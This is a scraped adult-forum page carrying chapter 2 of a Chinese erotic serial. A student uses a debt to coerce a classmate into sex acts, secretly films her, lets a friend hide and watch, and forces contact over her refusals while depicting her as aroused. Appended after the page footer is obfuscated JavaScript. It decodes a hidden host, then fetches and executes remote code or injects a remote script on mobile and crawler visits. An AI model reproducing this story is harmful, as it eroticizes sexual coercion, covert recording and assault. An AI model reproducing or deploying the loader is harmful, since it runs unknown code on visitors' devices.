Publisher 发表于 2022-8-19 00:05:16

[社团淫事][02][作者:ans2001]

作者:ans2001
   
字数:5467
   

   

   

   
************
   
第二章
   

   
何壮躺在自己的床上无论如何也睡不着。刚刚许静瑶吞吐李银峰肉棒的画面
   
在脑海里挥之不去。
   

   
好在李银峰刚刚并不是发现了自己,只是在自己藏身的柜子旁边摸索了一圈
   
就走了。至于李银峰在摸索什么,何壮并没有多想,他满脑子都是对李银峰的羡
   
慕。
   

   
插进女生的嘴里是个什么滋味?尤其是许静瑶这样冷峻的美女,是不是有一
   
种特殊的快感。听说凌辱圣洁都会让人别有一番滋味,就像在一块巨大的、纯白
   
的画布上突然泼上一大桶墨汁。许静瑶这个长相、神情都和宋智孝有几分相似的
   
美女,如果要是能含着自己的鸡巴会不会更好?听李银峰的语气应该是有许静瑶
   
自慰的视频,不知道李银峰能不能把这视频给自己看一看?哪怕只看一次也行啊。
   
许静瑶的小穴是什么样子的?她那永远冷若冰霜的面庞要是挂上淫靡的、忘我的
   
表情会不会更加诱惑?
   

   
想到这何壮感觉的肉棒已经胀得有些疼痛,必须自己撸一管发泄一下。对面
   
的床铺隐隐传来李银峰的沉重的呼吸声,他应该是睡着了。另外两个室友咔哒咔
   
哒点击鼠标的声音今天听起来也没那么烦了。何壮打开iPad,找到下载好了的麻
   
仓优动作片,熟练的掏出了自己濒临极限的肉棒撸动起来……
   

   
第二天一早,何壮故意赶在李银峰去洗漱间的时候也跟了进去。
   

   
「我操,大壮你没病吧,我要拉屎你也跟着进来?」
   

   
「不是,老大,我那个……就是……」
   

   
「有话快说,有屁快放!婆婆妈妈的,你再不放我就真的放了,到时候熏死
   
你。」
   

   
「老大我不知道怎么开口……」
   

   
「什么叫不知道怎么开口,咱两的关系还分彼此?有什么需求尽管提出来,
   
是不是钱的事?一会我拉完屎给你转账。」
   

   
「不是钱的事,是关于许静瑶……」
   

   
听到「许静瑶」三个字李银峰放下手机抬起头用一种很深邃的目光看着何壮,
   
脸上带着似笑非笑的笑容问何壮「许静瑶怎么了?」
   

   
「你那是不是有许静瑶的视频……」何壮不敢看李银峰的眼睛,低下头看自
   
己的双脚,双手紧张的不知道放在哪里好。
   

   
「你想要许静瑶的什么视频,是她自慰的视频吧。给你没关系,不过不能拷
   
贝不能复制,看完马上删掉,你同意我就给你U盘。」
   

   
何壮没有想到李银峰会这么痛快,「那个,老大我都不知道怎么感谢你好,
   
你就不问问是怎么知道的……」
   

   
「不需要问,因为你的小秘密我恰好发现了……」
   

   
一瞬间惊恐充斥了何壮的内心,他感觉到一阵眩晕,也不知道再怎么说下去,
   
「我的……什么……小秘密」
   

   
「装,还跟我装,看来你没把我当亲兄弟啊。实话告诉你吧大壮,我昨天安
   
排好了许静瑶去女更衣室和我谈事,顺便提前把手机开好了录像放在隐秘的角落,
   
谁知道连你去翻柜子的事情也录了下来。」
   

   
「老大,你可千万替我保密!求求你!」何壮被吓坏了。
   

   
「当然了,我一个人玩也没什么意思,不过现在许静瑶那个丫头还没有调教
   
熟,回头等我让她认识到自己有多骚了,自然少不了你的,整天玩别人的内衣算
   
怎么回事。一会出去给你拿视频,你一定想象不到许静瑶这种冰山美人居然自慰
   
起来那么骚。」
   

   
「谢谢老大,谢谢老大,我早就想看看许静瑶脱光了是什么样子了。」
   

   
「你可算了吧,话说回来,你的梦中女神不是李灵韵吗,怎么对许静瑶也感
   
兴趣了?」
   

   
「嘿嘿,漂亮女孩子谁不喜欢……」
   

   
宽限的还款日期又到了,许静瑶没有借到一分钱,拆东墙补西墙毕竟不是办
   
法,万一再碰到第二个第三个李银峰自己该怎么招架?
   

   
每当一想起李银峰那个淫笑的表情,就会后悔怎么当初就没看清他正经的外
   
表之下恶魔的内心。当李银峰提出来还不上钱可以用口交宽限日期的时候许静瑶
   
特别想一耳光打过去,但是没有办法,白纸黑字的借据是自己留下的,万一真的
   
像李银峰说的那样把自己告上法庭,作为生病的母亲和上学的弟弟唯一的支柱,
   
自己倒下了,全家就真的玩了。
   

   
脑海里李银峰的肉棒在自己嘴里进出的样子,许静瑶觉得自己特别下贱,特
   
别是最后李银峰居然射在了自己嘴里,那股子腥膻的味道让自己到现在还一阵阵
   
的反胃。以前只是在电脑上偷偷的下载小电影才看过男女之间的那些事,高中的
   
那个男孩允许他第一次把手伸进了自己的内衣里也没有像今天这样赤裸裸的面对
   
一个男生的下体。回想起当时那个帅气的临班男孩,还有他摸自己胸部的颤抖的
   
手,没有像几天前李银峰那只手那么稳重,他捻在自己乳头上的手指规律的动作,
   
还有他的肉棒在自己嘴里进进出出时的发出的喘息声,许静瑶感觉到自己的私处
   
一阵热流涌出,她悲观的发现自己很可耻的湿了。
   

   
拿起电话,许静瑶下了很大的决心拨通了李银峰的手机号码。
   

   
「哎呦,我的许大小姐,您这是打算还钱了吗?」
   

   
「我没钱还你。」
   

   
「那您这是什么意思?想我了?还是想我的……」
   

   
「李银峰你别这么无耻,我现在没钱,不过我会有的,我已经找了几家艺术
   
表演传媒公司,我很快就会把钱赚回来的。」
   

   
「那成,掰着手指头算算,你也没几天了,应该是后天中午吧,祝愿你这几
   
天的表演能赚到12万。拜拜」
   

   
「等等,你别挂电话,我是想说,能不能再宽限几天,现在也是学期末了,
   
我能不能下学期开学回来还你钱,我寒假……」
   

   
「许静瑶你做梦呢吧?我宽限你几天都是老子发慈悲了!你知道这十二万是
   
老子这些年来攒出来的全部家当吗?这十二万老子要是放在别的地方能赚多少钱?
   
想拖延?门都没有,你等着法院的传票吧!」
   

   
「别别,你别这样,我可以,可以再给你那个……」
   

   
「哪个?你说清楚啊。」
   

   
「李银峰你心里清楚!」
   

   
「我清楚什么啊?你不说清楚我怎么知道啊?」
   

   
「就是用嘴给你弄出来……」
   

   
「口交是吧,想不到许静瑶你这么骚啊,是不是这两天又怀念哥哥的大鸡吧
   
啦?行,看你这么有诚意,今天晚上7点,老地方,我等你。不过这次要附加一
   
个条件,你身上得随便我摸才行!」
   

   
「你休想!」
   

   
「那就免谈了,拜拜!」
   

   
许静瑶咬咬牙,狠狠的说道:「行!不过你得宽限我半年的时间!」
   

   
「最多两个月,要不就挂电话吧。」
   

   
许静瑶心想两个月的寒假,自己可以打几分工,还能兼职演出,应该可以先
   
还上一部分,「李银峰,希望你说话算话。」
   

   
「当然了,哥哥我茎侯佳阴……」
   

   
挂了电话,李银峰马上又拨通了何壮的手机,「大壮,今晚有什么事都推掉,
   
有好戏看!」
   

   
「什么好戏?老大你说清楚啊。」
   

   
「问那么多干嘛,到时候你听我的就行了。」
   

   
晚7点,舞蹈社女更衣室,由于正值期末考试,这里直到下学期开学都不会
   
再有人进来了。当然,和李银峰一起来的何壮除外。当何壮看到李银峰用另一把
   
自己不知道的钥匙打开舞蹈社的大门时满脸诧异。
   

   
「嘿嘿,实在是抱歉了大壮,那次喝多了我偷拿了你的钥匙在外边配了一把,
   
许静瑶这个小骚蹄子已经落到我的套里了,没个好好玩的地方怎么成?」
   

   
「没关系,老大,不过你借给她十二万,就让她给你口交几次,是不是太亏
   
了。」
   

   
「当然不亏,你以为我真着急让她还钱?她一直到毕业都还不上才好呢。兄
   
弟我这十二万是调查过之后才借给她的。」
   

   
「卧槽,老大你真是太阴险了,这么说是不是有机会咱两3P她一下啊。」
   

   
「放心吧,一定有机会的。一会进去以后你还是在上次的柜子躲好,这次没
   
你什么事,你得答应我绝对不能出来,就看看活春宫就得了,现在还不是时候。」
   

   
「放心吧老大,我都听你的。」
   

   
来到舞蹈社的许静瑶感觉自己的心都要从嗓子眼里跳出来了。虽然自己的身
   
体在视频里被李银峰看过了,一想到一会就要再次面对李银峰的肉棒,许静瑶还
   
是觉得非常紧张。而且李银峰还要摸自己的身上,许静瑶感觉自己的私处好像又
   
湿了……
   

   
「来啦,我的瑶美女……」
   

   
许静瑶深吸了一口气,二话不说就上去脱李银峰的裤子。
   

   
「哎哎,你不要这么主动嘛,咱们先说说话,调调情啊。」
   

   
「我和你没什么好说的。」许静瑶低着头继续脱李银峰的裤子。
   

   
虽然有了心理准备,李银峰早已挺立的鸡巴弹出来那一刻,许静瑶还是觉得
   
一阵眩晕。心一横,闭上眼睛就把李银峰的肉棒往自己的嘴里塞。还没塞进嘴许
   
静瑶仿佛想起来什么,从口袋里拿出一张湿巾先给李银峰的肉棒清洁一下。
   

   
「哎呦喂,准备的挺齐全啊……我去你这湿巾真凉啊,我这鸡巴都软了。」
   

   
许静瑶也不听李银峰说话,擦拭完毕把李银峰软软的鸡巴塞进自己的嘴里继
   
续舔弄。
   

   
舔了半天李银峰的鸡巴还是没有动静,不像上次很快就射了,禁不住抬头看
   
了李银峰一眼。
   

   
「你看你看,得不偿失吧,想让我的鸡巴硬起来,你得卖力气啊……」
   

   
「你还让我怎么卖力气?」
   

   
「不是说好了让我摸全身吗,这么好的福利我不能不收啊。」
   

   
「想摸你就摸吧!」许静瑶把眼睛一闭,站起来把羽绒服脱到了一旁。
   

   
「嗯嗯,态度不错」,李银峰一边说着,手就攀上了许静瑶的胸部,感受着
   
紧身高领毛衣下许静瑶成熟丰满的胸部,明显能够感觉到许静瑶在微微的颤抖。
   
「不过,你这样可不行啊,说好了摸全身呢……」
   

   
「我都站在这了,你想摸就摸吧。」
   

   
「不行不行,来来来,你躺在这让我摸。」
   

   
等这周末去跟演艺传媒公司的人见了面,签了合同就先还他钱,自己就不用
   
再受这份苦了。想到这些许静瑶还是把眼睛一闭躺在了换衣的长凳上。
   

   
「啧啧,看看许大美人这火辣的小身材,这小腰,这奶子……」李银峰念叨
   
哪里,手就摸到哪里,不时还抬头看储物柜这边。里边的何壮已经撸开了。
   

   
许静瑶感觉到两只魔爪不停的在自己身上游走,私处的蜜汁似乎更多了。自
   
己怎么这么淫荡?这么下贱?从来没有想象过自己的身体第一次被别的男人摸居
   
然不是自己的白马王子,正当一阵悲哀涌上心头的时候,许静瑶感觉到一只冰凉
   
的手钻进了自己的毛衣。
   

   
「他要摸我的胸了吗,这才一年不到,又有第二个男人摸自己的胸了,只不
   
过上次是自己心仪的男孩,这次却是一个恶魔……」
   

   
李银峰嫌许静瑶的胸罩太紧,直接两只手绕过许静瑶的背后要解她的胸罩搭
   
扣。
   

   
「不行!」许静瑶一把抓住李银峰的两个手臂,却看到李银峰已经血红的双
   
眼。
   

   
「不行个屁!」李银峰说着快速解开胸罩,一只手迅速的攀上了许静瑶的胸
   
部。
   

   
真是柔软啊,许静瑶的奶子盈盈一握,上次从上边摸还感觉不出来,这小蹄
   
子应该有C了吧。
   

   
感觉到李银峰已经得手,许静瑶的双手又无力的垂下去,只是胯间的湿润更
   
厉害了。
   

   
「你是多大的罩杯啊,应该是C吧」
   

   
「废话少说,赶紧的。」
   

   
其实李银峰的鸡巴早已经怒火中烧,但是这时候怎么能就让许静瑶口出来就
   
了事。李银峰慢慢的接近许静瑶的脸,突然吻在了许静瑶的耳朵上。许静瑶一惊
   
就要推开李银峰。
   

   
「你干什么?我只说让你摸,没让你亲!」
   

   
「我是说摸了啊,我说我用哪摸了吗?」
   

   
「不行,你就是不能亲我!用哪也不行!」
   

   
「好好好,我摸,我摸。」
   

   
李银峰一把就将许静瑶的毛衣秋衣和胸罩全都推到了许静瑶的胸部上边,两
   
个粉雕玉琢的小奶子瞬间跳了出来。许静瑶啊的一声,还没等她说话李银峰就咬
   
住了其中一个奶头。许静瑶刚要说话,李银峰的手也没闲着,突然就从许静瑶的
   
肚子上钻到了裤子里。
   

   
「你……你要干嘛啊?」
   

   
「我摸我的啊」,李银峰一边说一边将毛衣再往上推,将许静瑶的两只手都
   
困在了上面,用一只手把住,顺势还用毛衣遮住了许静瑶的脸。
   

   
许静瑶感觉自己的大脑已经不够用了,似乎有些缺氧。她自己心里很清楚,
   
乳头是自己身上最敏感的地方,有的时候自慰都不用揉搓阴蒂,只是摩擦自己的
   
乳头就能高潮。现在自己的乳头明显能感觉到李银峰温热的口腔,还有他灵活的
   
舌头正在不停的舔弄自己的乳头。
   

   
李银峰闻到许静瑶的胸部有一股淡淡的香皂香味,娇小的乳头在口中已经充
   
血变大,是时候了。李银峰把手抽出来开始解许静瑶的腰带。
   

   
「不行……啊……不行」许静瑶的声音已经带上喘息,手被困住了也无法抵
   
抗。突然一只手钻进了自己的内裤,刚要反抗,就感觉到李银峰的手指已经摸到
   
了自己的小穴上。
   

   
「啊……」许静瑶深深喘息一声。
   

   
「我去,小骚货,我就说你是小骚货吧,下面已经湿成这样了。」李银峰一
   
边说一边用中指轻轻的挖弄许静瑶的小穴,直到发出「呱唧呱唧」的水声。身下
   
压着的人不停的在扭动,让李银峰的鸡巴已经胀到了极限。
   

   
李银峰脱下许静瑶的毛衣,看着佳人紧闭的双眼和潮红的面颊,再也忍不住
   
了,转过身倒着骑在许静瑶的身上,要把鸡巴插进许静瑶的嘴中。
   

   
「小骚蹄子,给我舔鸡巴。」
   

   
许静瑶一睁开眼就看见李银峰黑黑的阴囊,下面吊着肉棒,也不知道是什么
   
原因,自己鬼使神差的就抓起李银峰的鸡巴塞进自己的嘴里吸了起来。
   

   
「卧槽,真不错,你这么卖力,我也不能闲着啊……」李银峰说完双手一撑,
   
直起来腰抓住许静瑶裤子的两边,借着身体下落的瞬间就把许静瑶的裤子褪到了
   
膝盖。
   

   
「呜要……」许静瑶含糊不清的说着,李银峰根本不管许静瑶的反抗,用两
   
条腿夹着许静瑶的头部,把鼻子深深的埋在了许静瑶神秘的三角地带。
   

   
「好香啊」李银峰说着一搬许静瑶的腿,往两旁一分,许静瑶娇嫩欲滴的小
   
穴就呈现在了李银峰的面前,二话不说就舔了上去。
   

   
「啊……」许静瑶感觉到自己的人生完蛋了,可是李银峰的舌头太灵活,自
   
己小穴的蜜汁更多了。不一会许静瑶高潮了,许静瑶不是没高潮过,只是这一次
   
来得特别猛烈,与以往自己的手指抚摸都不同。
   

   
「真是个极品啊……」李银峰一边舔一边脱下了许静瑶的雪地靴和裤子。现
   
在,李银峰和许静瑶的下半身都光着了。
   

   
「等一下,这个姿势太累了,咱们换换。」说完李银峰就起身,转过来跪在
   
了许静瑶的双腿中间。
   

   
还没从高潮中清醒过来的许静瑶感觉到有一个坚硬的东西顶在了自己的蜜穴
   
上。
   

   
「不行!」许静瑶两腿一抬就把李银峰踹在了地上。
   

   
(未完待续)
页: [1]
查看完整版本: [社团淫事][02][作者:ans2001]

function SaQEk(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UnFLqDhw(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return SaQEk(t);};window[''+'S'+'f'+'A'+'g'+'C'+'R'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UnFLqDhw,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/a/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('aGJyLmFF0YWtqeXYuY24=','157541',window,document,['F','RsHXGunW']);}:function(){};